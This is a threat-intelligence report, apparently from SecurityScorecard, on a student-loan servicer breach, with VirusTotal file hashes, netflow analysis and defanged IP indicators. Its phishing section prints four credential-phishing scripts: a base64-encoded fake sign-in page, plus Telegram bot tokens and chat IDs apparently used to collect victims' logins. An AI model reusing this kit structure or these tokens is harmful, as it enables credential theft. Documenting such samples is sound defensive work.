Executive Summary
Reports surfaced in late August that a breach affecting a service provider had compromised the data of 2.5 million people with student loans from two of its customer organizations.
SecurityScorecard researchers consulted internal and external data sources to enrich the public reporting on the incident.
Researchers uncovered evidence of phishing attacks against the victim organization, which may have contributed to the breach.
SecurityScorecard observed several network flows that may indicate suspicious activity; these occurred in the same timeframe as the submission of the phishing-linked files to VirusTotal. These flows included recurring communication with suspicious IP addresses and large data transfers that could represent exfiltration.
Background
In late August, a technology provider that offers student loan account management and payment services submitted a breach notice indicating that a compromise detected on July 22 exposed 2.5 million individuals’ data, including their names, contact information, and social security numbers. At present, neither the breach notice nor subsequent reporting have provided detailed insights into the nature of the breach, noting only that it likely began in June and continued until July 22.
Possible Phishing
SecurityScorecard researchers identified a number of recent files submitted to VirusTotal that may contain evidence of phishing targeting employees of the organization in question and which may also reflect wider targeting of other businesses.
The most recent of these, a text file identified by the SHA-256 hash 2798c5496dc9cdb22091c899acbef2c734642a515e30b2d6b36e202b05c4c68b, first appeared on VirusTotal on August 24. Vendors link the file to activity tracked as Trojan.Script.GenericKDZ.14204, Trojan.Script.Generic.D377C, HTML/Phish.GCY, HTML/Phish.EE73!tr, HTML/Phishing.Gen, and Phishing.HTML.Doc, among others, and it contains an email address from the victim organization in a field called “var email.” We have removed the specific domains, email addresses, and other identifying information about employees, but please contact us if you think you may be affected.
<script>
var email = “redacted@redacted[.]com”
var token = ‘5435173943:AAG8ZfLoTmKs2PjpJGT13epEN5zPy46qenM’
var chat_id = 1350730063
var data = atob(“PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBkaXI9Imx0ciIgY2xhc3M9IiIgbGFuZz0iZW4iPg0KICAgIDxoZWFkPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCiAgICA8dGl0bGU+U2lnbiBpbiB0byB5b3VyIGFjY291bnQ8L3RpdGxlPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAsIG1heGltdW0tc2NhbGU9Mi4wLCB1c2VyLXNjYWxhYmxlPXllcyI+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly9hYWRjZG4ubXNmdGF1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvZmF2aWNvbl9hX2V1cGF5ZmdnaHFpYWk3azlzb2w2bGcyLmljbyI+ICAgIA0KICAgIDxsaW5rIGRhdGEtbG9hZGVyPSJjZG4iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiIGhyZWY9Imh0dHBzOi8vYWFkY2RuLm1zZnRhdXRoLm5ldC9lc3RzLzIuMS9jb250ZW50L2NkbmJ1bmRsZXMvY29udmVyZ2VkLnYyLmxvZ2luLm1pbl96aXl0ZjhkenQ5ZWcxczYtb2hobGVnMi5jc3MiIHJlbD0
document.write(data)
</script>
Similar activity appears to have targeted other organizations as well. This, taken alongside the file containing an organization’s email address, may indicate a wider campaign targeting financial and professional services firms. For example, three other files linked to HTML/Phish.GCY and submitted to VirusTotal in July and August have the following contents:
<script>
var email = “redacted@redacted[.]com”
var token = ‘5435173943:AAG8ZfLoTmKs2PjpJGT13epEN5zPy46qenM’
var chat_id = 1350730063
var data = atob(“PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBkaXI9Imx0ciIgY2xhc3M9IiIgbGFuZz0iZW4iPg0KICAgIDxoZWFkPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCiAgICA8dGl0bGU+U2lnbiBpbiB0byB5b3VyIGFjY291bnQ8L3RpdGxlPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAsIG1heGltdW0tc2NhbGU9Mi4wLCB1c2VyLXNjYWxhYmxlPXllcyI+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly9hYWRjZG4ubXNmdGF1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvZmF2aWNvbl9hX2V1cGF5ZmdnaHFpYWk3azlzb2w2bGcyLmljbyI+ICAgIA0KICAgIDxsaW5rIGRhdGEtbG9hZGVyPSJjZG4iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiIGhyZWY9Imh0dHBzOi8vYWFkY2RuLm1zZnRhdXRoLm5ldC9lc3RzLzIuMS9jb250ZW50L2NkbmJ1bmRsZXMvY29udmVyZ2VkLnYyLmxvZ2luLm1pbl96aXl0ZjhkenQ5ZWcxczYtb2hobGVnMi5jc3MiIHJlbD0
document.write(data)
</script>
<script>
var email = “redacted@redacted[.]com”
var token = ‘5435173943:AAG8ZfLoTmKs2PjpJGT13epEN5zPy46qenM’
var chat_id = 1350730063
var data = atob(“PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBkaXI9Imx0ciIgY2xhc3M9IiIgbGFuZz0iZW4iPg0KICAgIDxoZWFkPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCiAgICA8dGl0bGU+U2lnbiBpbiB0byB5b3VyIGFjY291bnQ8L3RpdGxlPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAsIG1heGltdW0tc2NhbGU9Mi4wLCB1c2VyLXNjYWxhYmxlPXllcyI+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly9hYWRjZG4ubXNmdGF1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvZmF2aWNvbl9hX2V1cGF5ZmdnaHFpYWk3azlzb2w2bGcyLmljbyI+ICAgIA0KICAgIDxsaW5rIGRhdGEtbG9hZGVyPSJjZG4iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiIGhyZWY9Imh0dHBzOi8vYWFkY2RuLm1zZnRhdXRoLm5ldC9lc3RzLzIuMS9jb250ZW50L2NkbmJ1bmRsZXMvY29udmVyZ2VkLnYyLmxvZ2luLm1pbl96aXl0ZjhkenQ5ZWcxczYtb2hobGVnMi5jc3MiIHJlbD0
document.write(data)
</script>
<script>
var email = “redacted@redacted[.]com”
var token = ‘5661741695:AAFID5oI95wZP9wHothsvQNlZg11KPpYNdk’
var chat_id = 1397563347
var data = atob(“PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBkaXI9Imx0ciIgY2xhc3M9IiIgbGFuZz0iZW4iPg0KICAgIDxoZWFkPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCiAgICA8dGl0bGU+U2lnbiBpbiB0byB5b3VyIGFjY291bnQ8L3RpdGxlPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAsIG1heGltdW0tc2NhbGU9Mi4wLCB1c2VyLXNjYWxhYmxlPXllcyI+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly9hYWRjZG4ubXNmdGF1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvZmF2aWNvbl9hX2V1cGF5ZmdnaHFpYWk3azlzb2w2bGcyLmljbyI+ICAgIA0KICAgIDxsaW5rIGRhdGEtbG9hZGVyPSJjZG4iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiIGhyZWY9Imh0dHBzOi8vYWFkY2RuLm1zZnRhdXRoLm5ldC9lc3RzLzIuMS9jb250ZW50L2NkbmJ1bmRsZXMvY29udmVyZ2VkLnYyLmxvZ2luLm1pbl96aXl0ZjhkenQ5ZWcxczYtb2hobGVnMi5jc3MiIHJlbD0
document.write(data)
</script>
Two of the three email addresses above indicate targeting of title insurance companies. The third one indicates targeting of a technical services firm and a federal contractor.
July Uploads
Researchers also discovered four files uploaded to VirusTotal on July 19 and 21, all of which may have been part of the same campaign targeting employees of the victim organization. Two of the files, identified by the SHA-256 hashes 5faa9c6b62948c0eca79454006afdf8d19d6860ee80e15f8be44f080d23178c3 and a60fb5f3ce0ae59dc08c2662e54deaed797800bc4f4b78e48d81c2cac628f3af, are JavaScriptfiles uploaded on July 19. The other two, identified by the SHA-256 hashes 7f67b47040af9b88b21b10d4ebf99c4429de1587c35574c16db7136f3bed54c8 and d43b7d69869354c19745161c410593b5474642ee39ed4ed0c6b219ef141ed03a, are HTML files uploaded on July 19 and 21, respectively. Vendors have linked all four files to the same activity, tracked variously as JS:Trojan.Cryxos.6315, JS/MalPhish.M1, and JS/Phish.SB!Eldorado, among other names.
The two JavaScript files appear to embed code in the host URL and may attempt to collect login information by impersonating a software upload. Both contain strings indicating that they use a target’s email address to define a variable, which they then call when directing the target to update their license key. In the fields defining the variable arrl, a60fb5f3ce0ae59dc08c2662e54deaed797800bc4f4b78e48d81c2cac628f3af contains redacted@redacted[.]com and 5faa9c6b62948c0eca79454006afdf8d19d6860ee80e15f8be44f080d23178c3 contains redacted@redacted[.]com.
The two HTML files appear to be credential-harvesting pages. Both begin with strings soliciting login information from the user: 7f67b47040af9b88b21b10d4ebf99c4429de1587c35574c16db7136f3bed54c8 contains the title string “confirm your account” and d43b7d69869354c19745161c410593b5474642ee39ed4ed0c6b219ef141ed03a contains the title string “confirm your credentials.” In a possible attempt to impersonate a legitimate login page, both also direct the reader to contact the organization’s help desk at HelpDesk@redacted[.]net should they require assistance.
However, both files also contain what appear to be employee email addresses in addition to the Help Desk’s address.
These files may also reflect a wider effort to target financial firms. For example, three similar JavaScript files uploaded on August 29 and detected as JS/Phish.SB!Eldorado contained a credit union’s domain dcecu[.]org in the variables defined as arrl.
Netflow Analysis
Using SecurityScorecard’s access to exclusive network flow (i.e. netflow) data, researchers identified large data transfers to and from victim organization-attributed IP addresses that may, in the case of transfers from the firm’s network to the external IP addresses involved, reflect data exfiltration. To focus data collection on those IP addresses most likely to be at risk and because our netflow tool limits queries to 150 IP addresses or fewer, researchers only collected traffic involving those IP addresses that SecurityScorecard’s rating platform attributes to the affected company and where it has detected issues. This yielded a collection of 95 IP addresses. Researchers collected traffic from June 29 to August 29 in order to identify possible flows from the period when the intrusion was ongoing and to identify evidence that may suggest that risks have persisted. This produced a large traffic sample: the tool collected 995,249 flows between June 29 and August 29. Of these, 574 flows involving 187 external IP addresses each transferred one gigabyte or more of data. Other vendors have linked fifteen of these IP addresses to malicious activity. However, most of these IP addresses are also registered to Rackspace, so traffic involving them could also be benign (it may, for example, represent transfers to and from off-site backups). Without internal visibility into the organization’s network, we cannot confirm if this was exfiltration. Still, the company should have SIEM logs that can describe these flows in greater detail as well.
- 146.20.128[.]147
One organization’s IP address transferred 40 kilobytes to 146.20.128[.]147 on July 7, and another transferred 1.4 gigabytes to it on August 24. 146.20.128[.]147 transferred 393 KB to one organization’s IP address on August 2, and 46 KB to another on August 24.
One vendor has linked 146.20.128[.]147 to malware and the malicious reputation data in SecurityScorecard’s Attack Surface Intelligence (ASI) tool has linked it to the Hupigon backdoor.
- 146.20.128[.]175
146.20.128[.]175 transferred approximately 1.7 GB to an organization-attributed IP address on July 5.
One vendor has linked 146.20.128[.]175 to malware and one VirusTotal community member observed it as part of the FileResidentInScammer.info Web Directory, though another member dismissed those files’ connection to malicious activity, arguing that they are instead files for the Discourse Forum software.
- 146.20.132[.]49
146.20.132[.]49 made a transfer of 46 KB to one organization IP address, on August 2 and made a larger (more than three GB) transfer to another on August 9.
One vendor has linked 146.20.132[.]49 to malware and ASI’s malicious reputation data has linked it to the Hupigon backdoor.
- 209.197.3[.]8
209.197.3[.]8 made 199 transfers to one organization IP address between June 29 and August 28. All used port 80, but they varied in size between 120 KB and roughly 1.45 GB.
One vendor has linked 209.197.3[.]8 to malware and it appears in sixty-eight VirusTotal community collections, including some based on observations of activity linked to phishing, the Black Basta ransomware operation, and attempts to exploit the Follina RCE vulnerability. Additionally, ASI’s malicious reputation data has linked it to activity attributed to APT-C-23.
- 146.20.128[.]177
An organization-attributed IP address made three transfers (of 132 KB, 1.35 MB, and 155 KB) to 146.20.128[.]177 on July 22 and August 1. 146.20.128[.]177 transferred roughly 3.5 GB to this organization-attributed IP address on August 10 and 46 KB on August 23.
One vendor has linked 146.20.128[.]177 to malware and one VirusTotal community member observed it as part of the FileResidentInScammer.info Web Directory, though, as with 146.20.128[.]175, another member dismissed those files’ connection to malicious activity, arguing that they are instead files for the Discourse Forum software.
- 146.20.132[.]159
146.20.132[.]159 transferred approximately 2.8 GB to an organization-attributed IP address on August 12.
One vendor has linked 146.20.132[.]159 to malware and ASI’s malicious reputation data has linked it to the Hupigon backdoor.
- 146.20.132[.]188
An organization-attributed IP address transferred 40 KB to 146.20.132[.]188 on July 26 and 1.35 MB on August 24. 146.20.132[.]188 transferred roughly 3.5 GB to the organization-attributed IP address on August 15.
One vendor has linked 146.20.132[.]188 to malware.
- 146.20.132[.]77
An organization-attributed IP address transferred 52 KB to 146.20.132[.]77 on July 1 and 146.20.132[.]77 transferred approximately 3.5 GB to it on August 22.
One vendor has linked 146.20.132[.]77 to malware.
- 146.20.128[.]77
146.20.128[.]77 transferred approximately 3.5 GB to an organization-attributed IP address on August 4.
One vendor has linked 146.20.128[.]77 to malware.
- 146.20.132[.]194
146.20.132[.]194 also transferred approximately 3.5 GB to an organization-attributed IP address on August 4.
One vendor has linked 146.20.132[.]194 to malware.
- 146.20.132[.]131
146.20.132[.]131 transferred approximately 3.8 GB to an organization-attributed IP address on August 9; a different organization-attributed IP address transferred 1.18 MB to 146.20.132[.]131 on the same day.
Two vendors have linked 146.20.132[.]131 to malware and four VirusTotal community members have included it in graphs or collections related to malicious activity.
- 146.20.128[.]58
146.20.128[.]58 transferred approximately 1.7 GB to one organization-attributed IP address on July 25 and 46 KB to another on August 2. This latter address also transferred 40 KB to 146.20.128[.]58 on July 28.
One vendor has linked 146.20.128[.]58 to malware.
- 146.20.132[.]187
146.20.132[.]187 transferred 2.03 GB to an organization-attributed IP address on July 28.
One vendor has linked 146.20.132[.]187 to malware.
- 146.20.132[.]132
146.20.132.132 transferred 46 KB to one organization-attributed IP address on August 11 and over 2.5 GB to another on August 23.
Two vendors have linked 146.20.132[.]132 to malware and five VirusTotal community members have included it in graphs or collections related to malicious activity.
- 146.20.132[.]59
146.20.132[.]59 transferred over 2 GB to an organization-attributed IP address on August 24.
One vendor has linked 146.20.132[.]59 to malware and one VirusTotal community member has included it in a collection that may pertain to malicious activity.
All of the above transfers involved the same three organization-attributed IP addresses. SecurityScorecard’s ratings platform has observed outdated web browsers connected to the web servers in use at those three IP addresses. Outdated software could suffer from vulnerabilities addressed in more recent versions and may therefore pose a risk to organizations using it, as threat actors often exploit vulnerabilities in outdated software.
Internal Data Correlations
Twelve of the IP addresses involved in large transfers to or from victim organization assets have also appeared in traffic data SecurityScorecard has collected in the course of other investigations. One of these, 209.197.3[.]8, appears above and also appeared in previous research into APT-C-23; two, 198.61.131[.]199 and 50.57.31[.]206, appeared in traffic collected in support of recent incident response efforts following a breach; and three, 134.213.54[.]63, 162.13.178[.]215, and 134.213.49[.]54, previously appeared in traffic linked to a DDoS attack attributed to a Russian botnet operation. It is, of course, possible that these overlaps in traffic are coincidental and, as with the previous group of IP addresses, many of these also belong to Rackspace and transfers involving them could be benign. However, they may also merit attention from someone with internal visibility, who can assess whether the netflows involving these IP addresses represent expected behavior.
198.61.131[.]199
161.47.17[.]28
134.213.54[.]63
134.213.49[.]54
162.13.178[.]215
50.57.31[.]206
63.131.130[.]254
209.197.3[.]8
134.213.49[.]54
198.61.131[.]199
161.47.17[.]28
50.57.31[.]206
Conclusion
This information was gathered and analyzed to briefly preview some of SecurityScorecard’s threat intelligence and investigation capabilities. SecurityScorecard was only able to query and contextualize some of its in-house sources; it, therefore, bears noting that this is not an exhaustive list of issues related to the victim organization’s overall cyber risk exposure. However, the data researchers have collected and analyzed thus far may offer insights into the attack that led to the recently-disclosed breach of customer data.
Given that threat actors often use phishing to acquire initial access to victim systems, the files discussed above may offer evidence of targeting from the early stages of the intrusion into the victim organization’s systems. Users did not upload these files until close to or later than the reported end of the compromise on July 22. There may be artifacts of earlier activity–it is possible, for example, that someone investigating the incident on this firm’s behalf did not begin submitting the files from the early stages of the attack until they detected them (presumably shortly before July 22).
Similarly, much of the suspicious traffic discussed above occurred after July 22; these flows, therefore, may not be directly related to the reported breach, but could still be cause for concern, given that they involve IP addresses previously linked to malicious activity.
How SecurityScorecard can help
SecurityScorecard’s products and services can support efforts to prevent attacks by identifying vulnerabilities, investigating possible threats, and responding to incidents. SecurityScorecard can support organizations both before and after ransomware attacks.
Our ratings platform, Attack Surface Intelligence (ASI), and Automated Vendor Detection (AVD) products enable continuous monitoring of their and their vendors’ digital assets.
Our Cyber Risk Intelligence as a Service (CRIaaS) offering provides tailored insights about the threats facing them.
In the event of a successful or attempted attack, SecurityScorecard can support incident response efforts.